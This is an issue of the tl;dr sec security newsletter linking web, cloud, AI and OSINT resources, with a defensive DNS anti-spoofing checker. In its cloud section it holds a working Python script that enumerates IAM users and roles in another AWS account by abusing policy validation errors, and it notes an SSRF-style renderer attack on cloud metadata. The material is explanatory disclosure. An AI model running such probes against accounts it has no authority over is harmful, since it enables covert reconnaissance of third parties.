
[tl;dr sec] #62 - Leaking IAM Users and Roles, AI, and Exploiting Dynamic Renderers

A tool to sneakily enumerate all IAM users and roles in a target AWS account, recent events in AI, and how to attack server-side renderers.

Hey there,

I hope you’ve been doing well! I missed you, dear reader.

A Tryptophan-induced Reflection

Last week I did some reflecting. I have a lot to be thankful for, but I want to mention one thing in particular.

I wanted to share my writing online for a long time, but to be honest, I was scared to do it. Don’t other people know more? Isn’t the Internet a Nasty and Mean Place?

But people have been really nice about tl;dr sec! 😱 I’ve been blown away by people’s kind words about how they find it useful, look forward to it, how it made them laugh in a meeting and get in trouble with their boss, and more.

This encouragement has frankly been key to me continuing, when it’s yet again 11:09pm on a Wednesday and I’m wrapping up another issue.

I wanted to share this anecdote because if you’re reading this and have been wanting to share your work, you should!

I know that you have knowledge that other people would love to read.

Write it down. Share it.

We’ll be glad you did.

Speaking Stuff

OWASP Israel - Tues, Dec 8th
I’ll be joining some cool speakers chatting about Kubernetes and XXE.

Empire Hacking - Tues, Dec 8th
After refocusing myself by meditating in a redwood forest, I’ll join Empire Hacking, an awesome meet-up by Trail of Bits.

As they’re also program analysis nerds, they’ve asked me to include more details on Semgrep internals and design decisions, so if you’re curious about how Semgrep works at a deeper level, this one will be good to check out.

Open Security Summit - Fri, Dec 11th
I’ll be giving a Semgrep workshop, where I’ll try something I’ve never done before! I’m going to live tweet Semgrep challenges (match this code, don’t match that code) and let people tweet back their solutions.

Should be fun! Or it may blow up in my face, we’ll see 😅 Keep an eye on @clintgibler if you want to join, hope to see you there!

Sponsor

📢 Secure Your Business-Critical SaaS with AppOmni

AppOmni is the leading provider of SaaS Security Posture Management (SSPM) solutions. We provide data access visibility, management, and security for SaaS solutions, enabling organizations to secure sensitive data. AppOmni’s technology deeply scans APIs, security controls, and configuration settings to evaluate the current state of SaaS deployments and compare it against best practices. With AppOmni, organizations can establish rules for data access, data sharing, and third-party applications that are continuously and automatically validated.

📜 In this newsletter...

🔗 Links:

  • Web Security: Chrome extension to detect DOM XSS by abusing Trusted Types, exploiting dynamic rendering engines

  • AI: DeepMind's protein-folding breakthrough, 5 AI achievements in 2020, GPT-3 overview, A/B test your titles for Hacker News

  • Red Team: Minimal Docker container bundled with security tools

  • Cloud Security: Query your cloud config and metadata like SQL, find exposed S3 objects, an overview of interesting pre:invent announcements, find existing users and IAM roles in arbitrary AWS accounts, back up your G Suite data to AWS

  • Container Security: Scan Helm charts for K8s misconfigurations

  • Politics / Privacy: Maybe economic inequality, minimal social mobility, and more are the historic norm, not recent bad trends

  • OSINT: Search URLs exposed by shortener services, a security tool is accurately represented in court

  • Misc: Remap all git HTTP URLs to SSH, protect domains that don't send email, a proposed service for surfacing great creators

Web Security

filedescriptor/untrusted-types
A Chrome extension by @filedescriptor that abuses Trusted Types to find DOM XSS by logging the stack trace of all sink calls and their changes to the DOM. If this sounds interesting, I highly recommend also checking out Tracy, a browser extension for web app pen testing by my friends Jake Heath and Michael Roberts, which to my knowledge is the best tool to trace user input in and out of web apps.

Exploiting dynamic rendering engines to take control of web apps
Dynamic rendering is a technique some web apps use to serve pre-rendered pages (generated server-side, typically by a headless browser) to crawlers for better SEO. r2c’s Vasilii Ermilov describes techniques to exploit common dynamic rendering tools (the renderer fetches URLs on the attacker’s behalf, so it can be pointed at the cloud instance metadata endpoint, SSRF-style), how to fingerprint when sites are using dynamic rendering, and more. One of the attack chains described involves a series of nested requests that honestly hurts my brain, but is cool to read.

AI

DeepMind’s protein-folding AI has solved a 50-year-old grand challenge of biology
AlphaFold can predict the shape of proteins to within the width of an atom, which will help scientists design drugs and understand disease. “AlQuraishi thought it would take researchers 10 years to get from AlphaFold’s 2018 results to this year’s. This is close to the physical limit for how accurate you can get, he says.” More from DeepMind’s blog.

Top 5 AI Achievements of 2020
M Umer Mirza describes 5 topics/areas: 1) GPT-3, 2) AI-enabled healthcare and drug discovery, 3) graphics, animation, image and video processing, 4) motion and gestures, and 5) NVIDIA AI’s processing power.

GPT-3 vs. Existing Conversational AI Solutions
An overview of GPT-3, things it can do well (e.g. knowledge retrieval), limitations (inferred knowledge, knowing when it doesn’t know something), examples on why explainability is important in ML, and some pricing info.

A/B Test your Hacker News titles with AI before publishing
Enter two potential titles and it’ll recommend one. By Kimmo Ihanus.

Red Team

higatowa/bento
“A simple and minimal Docker container for penetration testers and CTF players. It has the portability of Docker with the addition of X, so you can also run GUI applications (like Burp).” Currently includes: Burp Suite, gobuster, SecLists, odat, impacket, sqlmap, sqlplus, mysql-client, openvpn, bytecode-viewer, Ghidra.

Cloud Security

cloudquery/cloudquery
Ease monitoring, governance, and security by querying your cloud configuration and metadata as SQL.

nccgroup/s3_objects_check
By NCC Group’s Xavier Garceau-Aranda: whitebox evaluation of effective S3 object permissions to identify publicly accessible objects as well as objects accessible to AuthenticatedUsers (by using a secondary profile).

pre:Invent 2020
Chris Farris describes 29 of the 279 pre:invent announcements he found interesting, covering AWS Organizations, new security tools, serverless, ElasticSearch, and DynamoDB. Also featuring an excellent banner image 🤣

I’m out of new travel photos, so here is a scene from the back of the Sans Expo in the alternate universe where re:Invent was in-person

Information Leakage in AWS Resource-Based Policy APIs
In this Unit 42 blog post, researchers disclose a class of AWS APIs that can be abused to find existing users and IAM roles in arbitrary accounts. The root cause is that the AWS backend validates every resource-based policy it is handed and rejects, with an error, any policy that names a principal that does not exist. Because the policy is attached to a resource in the attacker’s own account, each probe either fails with an “invalid principal” error or is accepted, revealing whether a guessed user or role name exists in the target account, and nothing shows up in the target account’s CloudTrail logs.

Based on these findings, Unit 42 developed IAMFinder, an open source tool that currently implements the APIs of four AWS services: S3, KMS, SQS, and IAM. Given only the target’s AWS account number (plus a wordlist of candidate names), IAMFinder can identify users and roles in that environment. The practical takeaway: treat IAM principal names as non-secret, and avoid baking anything sensitive (customer names, project code names) into role and user names, since an account ID and a wordlist are all an attacker needs to start mapping them.
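To make the technique concrete, here is an added example of the S3 variant, written for this issue; it is not Unit 42’s or IAMFinder’s code. It assumes you own a bucket (`PROBE_BUCKET`) in your own account and may call PutBucketPolicy/DeleteBucketPolicy on it, and that S3 still answers a missing principal with a `MalformedPolicy` / “Invalid principal in policy” error, as it did when this was written. The target account number, bucket name, wordlist, and the `FakeS3` client are all constructed so the script runs offline; swap in `boto3.client("s3")` for a real probe.

```python
"""Probe whether a named IAM user or role exists in another AWS account by
abusing resource-based policy validation (the technique behind IAMFinder).

Added example for this issue, not Unit 42's or IAMFinder's code. Assumes
PROBE_BUCKET is a bucket in the prober's *own* account on which they may
call PutBucketPolicy/DeleteBucketPolicy. The error code and message matched
below are what S3 returned for a missing principal at time of writing.
"""
import json

TARGET_ACCOUNT = "123456789012"    # target account number (constructed)
PROBE_BUCKET = "my-probe-bucket"   # bucket the prober owns (assumption)


def principal_arn(account, kind, name):
    """ARN of an IAM user or role in the target account."""
    if kind not in ("user", "role"):
        raise ValueError("kind must be 'user' or 'role'")
    return f"arn:aws:iam::{account}:{kind}/{name}"


def probe_policy(bucket, principal):
    """Bucket policy naming the principal but granting nothing: Effect is
    Deny so an existing principal gets no access while it is attached."""
    return {"Version": "2012-10-17", "Statement": [{
        "Sid": "ExistenceProbe", "Effect": "Deny",
        "Principal": {"AWS": principal},
        "Action": "s3:GetObject",
        "Resource": f"arn:aws:s3:::{bucket}/*"}]}


def classify(error_code, error_message):
    """No error: S3 accepted the policy, so the principal exists.
    MalformedPolicy + 'Invalid principal': it does not.
    Anything else (throttling, AccessDenied on our own bucket, ...) is not
    evidence either way and must not be counted as a hit or a miss."""
    if error_code is None:
        return "exists"
    if error_code == "MalformedPolicy" and "Invalid principal" in (error_message or ""):
        return "missing"
    return "inconclusive"


def probe(s3, bucket, principal):
    """Attach the probe policy, classify the outcome, detach it again."""
    try:
        s3.put_bucket_policy(Bucket=bucket,
                             Policy=json.dumps(probe_policy(bucket, principal)))
    except Exception as exc:  # botocore's ClientError carries a .response dict
        response = getattr(exc, "response", None)
        if response is None:
            raise
        err = response.get("Error", {})
        return classify(err.get("Code"), err.get("Message"))
    s3.delete_bucket_policy(Bucket=bucket)  # accepted: clean up immediately
    return "exists"


def enumerate_principals(s3, bucket, account, names):
    """Try each name as a user and as a role; return the ARNs that exist."""
    found = []
    for name in names:
        for kind in ("user", "role"):
            arn = principal_arn(account, kind, name)
            if probe(s3, bucket, arn) == "exists":
                found.append(arn)
    return found


class FakeS3:
    """Constructed stand-in for boto3's S3 client so this runs offline: accepts
    policies naming a principal in `existing`, rejects others the way S3 does."""
    def __init__(self, existing):
        self.existing, self.policy = set(existing), None

    def put_bucket_policy(self, Bucket, Policy):
        arn = json.loads(Policy)["Statement"][0]["Principal"]["AWS"]
        if arn not in self.existing:
            exc = Exception("MalformedPolicy")
            exc.response = {"Error": {"Code": "MalformedPolicy",
                                      "Message": "Invalid principal in policy"}}
            raise exc
        self.policy = Policy

    def delete_bucket_policy(self, Bucket):
        self.policy = None


if __name__ == "__main__":
    # Offline demo; replace FakeS3(...) with boto3.client("s3") for a real probe.
    s3 = FakeS3({principal_arn(TARGET_ACCOUNT, "role", "OrganizationAccountAccessRole")})
    for arn in enumerate_principals(s3, PROBE_BUCKET, TARGET_ACCOUNT,
                                    ["admin", "OrganizationAccountAccessRole", "jenkins"]):
        print("exists:", arn)
    assert s3.policy is None, "probe policy must never be left attached"
```

Two design points worth noting: the probe statement is a Deny, so a principal that does exist never gains access to your bucket during the instant the policy is attached, and any error other than the specific “invalid principal” rejection is reported as inconclusive rather than silently counted as a miss, which keeps throttling or a permissions mistake on your own bucket from corrupting the results.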

Setting up personal G Suite backups on AWS
Scott Piper describes how he automates the backup of his Gmail and Google Drive to AWS. Tools referenced:

  • GAM: a CLI tool for Google Workspace (fka G Suite) Administrators to manage domain and user settings quickly and easily

  • got-your-back: a CLI tool for backing up your Gmail messages to your local computer, using Gmail’s API over HTTPS.

  • Rclone: a CLI program to manage files on cloud storage.

Container Security

Scan Helm charts for Kubernetes misconfigurations with Checkov
Post by Bridgecrew’s Matt Johnson. Checkov uses `helm template` to render the chart into the resulting Kubernetes manifests and scans those for insecure patterns (e.g. checks derived from the CIS Kubernetes Benchmarks), so the scan covers what the chart actually deploys rather than the templates alone.

Politics / Privacy

Welcome to the new Middle Ages
This article argues that the recent rise in economic inequality, decline in social mobility, identity-based culture wars in politics, and more are not necessarily current bad trends, but rather, are historical norms.

Today the richest 40 Americans have more wealth than the poorest 185 million Americans. The leading 100 landowners now own 40 million acres of American land, an area the size of New England.

Politics has returned to its pre-modern role of religion. The Internet has often been compared to the printing press, and when printing was introduced it didn’t lead to a world of contemplative philosophy; books of high-minded inquiry were vastly outsold by tracts about evil witches and heretics.

… the post-printing early modern period was the golden age of religious hatred and torture; the major witch hunts occurred in an age of rising literacy, because what people wanted to read about was a lot of the time complete garbage.

OSINT

utkusen/urlhunter
Tool by Utku Şen that enables searching URLs that are exposed via shortener services such as bit.ly and goo.gl. Uses data from URLTeam, who continuously bruteforce URL shortener services and publish their results. If you pay attention closely, you might get a slight feel for how URLTeam feels about shorteners.

Misusing OSINT to claim election fraud
Imagine waking up one day and finding a security tool you built being horribly misused in court 😅 This is basically what happened to OSINT tool Spiderfoot’s author Steve Micallef. In short, someone scanned Dominion Voting’s domain name and used the results to support claims that the voting systems were accessible over the Internet and being controlled by foreign countries like Iran and China. Steve’s post nicely discusses how to cautiously and accurately use OSINT info and debunks a number of the case claims. In short:

Misc

Protect domains that don’t send email
The UK government (NCSC) on how to make sure that domains which do not send email cannot be used for spoofing, using SPF, DMARC, and DKIM records that explicitly authorise no senders and tell receivers to reject anything claiming to come from the domain.
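As an added example (not from the NCSC page), here is a small checker that enforces the core of that guidance on a set of DNS TXT records: an SPF record that authorises nobody, a DMARC policy of reject, and a wildcard DKIM record with an empty key so no selector can ever validate. The records for `example.org` are constructed, with a weak set beside a hardened set; the linked guidance is the authority for the exact records to publish.

```python
"""Check the DNS TXT records that stop a domain which never sends email from
being spoofed. Added example, not from the NCSC page; all records below are
constructed. Expected values follow the widely published pattern for
non-sending domains: SPF authorising no senders, DMARC p=reject, and a
wildcard DKIM record with an empty key so no selector can ever produce a
valid signature.
"""

# Constructed records, keyed by TXT record owner name.
WEAK = {
    "example.org": ["v=spf1 ~all"],                                   # softfail, not fail
    "_dmarc.example.org": ["v=DMARC1; p=none; rua=mailto:dmarc@example.org"],
    # no DKIM record at all
}
HARDENED = {
    "example.org": ["v=spf1 -all"],
    "_dmarc.example.org": ["v=DMARC1; p=reject; sp=reject; adkim=s; aspf=s"],
    "*._domainkey.example.org": ["v=DKIM1; p="],
}


def parse_tags(record):
    """Parse a 'tag=value; tag=value' record (DMARC/DKIM syntax) into a dict."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def check_no_mail_domain(domain, txt):
    """Return a list of findings; an empty list means the domain is locked down."""
    findings = []

    # SPF: exactly one record, and it must fail every sender.
    spf = [r for r in txt.get(domain, []) if r.lower().startswith("v=spf1")]
    if len(spf) != 1:
        findings.append("SPF: expected exactly one v=spf1 record")
    elif spf[0].split() != ["v=spf1", "-all"]:
        findings.append(f"SPF: should be 'v=spf1 -all', got '{spf[0]}'")

    # DMARC: reject for the domain and (explicitly or by inheritance) its subdomains.
    dmarc = [r for r in txt.get(f"_dmarc.{domain}", []) if r.upper().startswith("V=DMARC1")]
    if len(dmarc) != 1:
        findings.append("DMARC: expected exactly one v=DMARC1 record")
    else:
        tags = parse_tags(dmarc[0])
        if tags.get("p") != "reject":
            findings.append(f"DMARC: policy should be p=reject, got p={tags.get('p')}")
        if tags.get("sp", "reject") != "reject":   # sp inherits p when absent
            findings.append(f"DMARC: subdomain policy should be reject, got sp={tags['sp']}")

    # DKIM: a wildcard selector record with an empty public key voids every selector.
    dkim = [parse_tags(r) for r in txt.get(f"*._domainkey.{domain}", [])]
    if [t.get("p") for t in dkim if t.get("v", "").upper() == "DKIM1"] != [""]:
        findings.append("DKIM: publish '*._domainkey' TXT \"v=DKIM1; p=\" to void every selector")
    return findings


if __name__ == "__main__":
    for label, records in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, check_no_mail_domain("example.org", records) or ["ok"])
```

In practice you would feed this the output of a TXT lookup for the three names rather than the constructed dicts; the point of the DKIM check is that without the wildcard record, an attacker who can influence any mail with a forged `d=example.org` signature has nothing published that contradicts them, whereas `p=` guarantees every selector fails verification.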

Introducing Amazon Curate (I Wish)
One of the main reasons I started tl;dr sec is that I kept coming across really great work that not enough people had heard of. So I thought this faux AWS product by Daniel Miessler would be pretty awesome, and help address the challenge of surfacing great work done by (currently) relatively unknown creators.

✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I'd love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏

Thanks for reading!

Cheers,
Clint
@clintgibler @tldrsec